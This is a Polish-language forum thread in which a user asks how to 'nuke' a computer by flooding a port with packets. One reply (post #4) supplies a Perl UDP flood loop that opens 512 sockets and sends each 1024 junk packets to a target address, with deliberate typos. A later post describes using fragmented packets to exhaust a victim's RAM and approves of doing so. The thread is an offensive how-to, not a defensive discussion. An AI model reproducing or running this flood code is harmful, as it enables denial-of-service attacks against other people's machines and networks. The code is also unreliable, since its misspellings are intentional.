Pokaż wyniki 1 do 7 z 7

Temat: Nukowanie

  1. #1
    Zarejestrowany
    Sep 2008
    Postów
    43

    Domyślnie Nukowanie

    Witam!

    Ostatnio postanowiłem zainteresować sie troche nukowaniem, z tego co wie to jest to zasypywanie jakiegoś portu pakietami, może to doprowadzić do zawieszenia aplikacji/komputera. Więc napisałem sobie prosty serwer i klient na WinSock, wszystko działa ładnie pięknie, łącze sie do swojego serwera on wysyła mi wiadomośc powitalną a ja mu jakieś bzdety. Ale żeby połączenie zostało nawiązane serwer musi je zaakceptować, jeżeli tego nie zrobi to nici z połączenia. Jeżeli chciał bym znukować np swój komputer, to musiał bym miec jakis serwer żeby sie do niego podłączyć i go nukować, ale co jak nie mam żadnego serwera? Tylko same klienty, wtedy musi dojść do połączenia klient-klient Skanery portów łączą sie z portami i sprawdzają czy są otwarte/zamknięte itp.Wniosek taki że mam wysyłać pakiety podobnie jak to robią skanery

  2. #2
    Avatar GSG-9
    GSG-9 jest offline Shapeshifter
    Zarejestrowany
    Jul 2007
    Skąd
    C:\Perl\bin
    Postów
    1,578

    Domyślnie

    pchaj pakiety gdzies na chama, nie czekaj na nic ;x
    War, war never changes.

  3. #3
    Zarejestrowany
    Sep 2008
    Postów
    43

    Domyślnie

    ale żeby coś wysłać musze sie z tym przecież połączyć. A ja chce sie dowiedzieć jak wysyłać pakiety bez takiego "połączenia".

  4. #4
    Avatar GSG-9
    GSG-9 jest offline Shapeshifter
    Zarejestrowany
    Jul 2007
    Skąd
    C:\Perl\bin
    Postów
    1,578

    Domyślnie

    Kod:
    my $iaddr = inet_aton("$data");
       my $paddr = sockaddr($port,$iaddr);
       my $proto = getprtobyname('udp');
       my $packet = "X" x 1000;
    	 $packet .= "\015\012";
    	 sub flood{
    		my $i;
    		my $j  = 0;
    		
    		for($j=0;$j<512;$j++) {
    		socket(SOCK, INET, SOCK_DGRAM, $proto) or die "socket: $";
                    connect(SOCK, $paddr) or die "connect: $";
    		for($i=0;$i<1024;$i++)
                       {
                  print SOCK $packet;
                       }
    	      close(SOCK);
    mowilem, na chama
    literowki celowe.
    War, war never changes.

  5. #5
    Zarejestrowany
    Jun 2006
    Skąd
    rand(.eu)
    Postów
    8,748

    Domyślnie

    Jak nic nie akceptuje polaczenia na drugim koncu (ofiara) to jedyne co mozesz zrobic to zapchac jego lacze. Nie jestes w stanie przepchac wiecej pakietow (ktore sa wieksze) niz to co ofiara moze odrzucic...
    ctrl-alt-del.cc - soft reset site for IT admins and other staff :-)

  6. #6
    Zarejestrowany
    Sep 2008
    Postów
    43

    Domyślnie

    No teraz poczytałem o UDP i wiem już co i jak ale to spowolni transfer a tym porcie, ale w jaki sposób może doprowadzić to do zawieszenia komputera

  7. #7
    Avatar GSG-9
    GSG-9 jest offline Shapeshifter
    Zarejestrowany
    Jul 2007
    Skąd
    C:\Perl\bin
    Postów
    1,578

    Domyślnie

    jesli pakiety beda fragmentowane (tak jakby dzielone na kilka czesci...)- wszystko odkladane bedzie na stos, a twoj komp nadal bedzie czekac na pozostale czesci pakietu, zawalajac caly ram. powstrzymac moze to tylko twoj isp. fajnie, nie?
    War, war never changes.

Zasady Postowania

  • Nie możesz zakładać nowych tematów
  • Nie możesz pisać wiadomości
  • Nie możesz dodawać załączników
  • Nie możesz edytować swoich postów
  •  
Subskrybuj

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52